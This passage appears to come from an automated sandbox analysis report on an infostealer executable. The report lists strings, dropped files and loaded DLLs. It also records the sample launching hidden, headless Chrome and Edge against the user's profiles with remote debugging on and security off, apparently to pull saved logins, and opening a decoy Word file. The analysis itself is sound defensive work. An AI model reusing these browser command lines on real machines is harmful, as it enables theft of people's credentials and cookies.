      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs #U2800.exe
      Source: #U2800.exeBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs #U2800.exe
      Source: #U2800.exeBinary or memory string: _legalCopyright"_originalFilename vs #U2800.exe
      Source: #U2800.exeBinary or memory string: OriginalFilename vs #U2800.exe
      Source: #U2800.exeBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs #U2800.exe
      Source: #U2800.exeBinary or memory string: OriginalFilenameSystem.Management.dll@ vs #U2800.exe
      Source: #U2800.exeBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs #U2800.exe
      Source: #U2800.exeBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs #U2800.exe
      Source: classification engineClassification label: mal80.troj.spyw.winEXE@16/21@5/6
      Source: C:\Users\user\Desktop\#U2800.exeFile created: C:\Users\Public\Documents\638724335987723943Jump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeFile created: C:\Users\user\AppData\Local\Temp\tmpl45vff.tmpJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: #U2800.exe, #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: #U2800.exe, #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: #U2800.exe, #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: #U2800.exe, #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: #U2800.exe, #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: #U2800.exe, 00000000.00000003.1975493099.00000274BB98D000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980765806.00000274BB9EB000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974796817.00000274BB9EB000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974483489.00000274BB98D000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1937036698.00000274BB9EB000.00000004.00000020.00020000.00000000.sdmp, Default_LoginDataTemp.db.0.dr, tmpbabou3.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: #U2800.exe, #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
      Source: unknownProcess created: C:\Users\user\Desktop\#U2800.exe "C:\Users\user\Desktop\#U2800.exe"
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9940 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1496 --field-trial-handle=1412,i,1880480402354006827,1683441286412184854,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1420,i,14764490756503719994,12081713537846104491,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9940 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1496 --field-trial-handle=1412,i,1880480402354006827,1683441286412184854,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1420,i,14764490756503719994,12081713537846104491,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: icu.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: wshunix.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: e_sqlite3.dllJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeSection loaded: ntmarta.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
      Source: #U2800.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: #U2800.exeStatic file information: File size 26468352 > 1048576
      Source: #U2800.exeStatic PE information: Raw size of .managed is bigger than: 0x100000 < 0x83b200
      Source: #U2800.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfb7a00
      Source: #U2800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: #U2800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: #U2800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: #U2800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: #U2800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: #U2800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: #U2800.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: #U2800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: #U2800.exe
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: #U2800.exe
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: #U2800.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: #U2800.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: #U2800.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: #U2800.exe
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: System.IO.Compression.ni.pdb source: #U2800.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: #U2800.exe
      Source: #U2800.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: #U2800.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: #U2800.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: #U2800.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: #U2800.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: #U2800.exeStatic PE information: section name: .managed
      Source: #U2800.exeStatic PE information: section name: hydrated
      Source: e_sqlite3.dll.0.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7CCC82 push rbx; retn 000Ah0_2_00007FFDFB7CCC89
      Source: C:\Users\user\Desktop\#U2800.exeFile created: C:\Users\user\Desktop\e_sqlite3.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
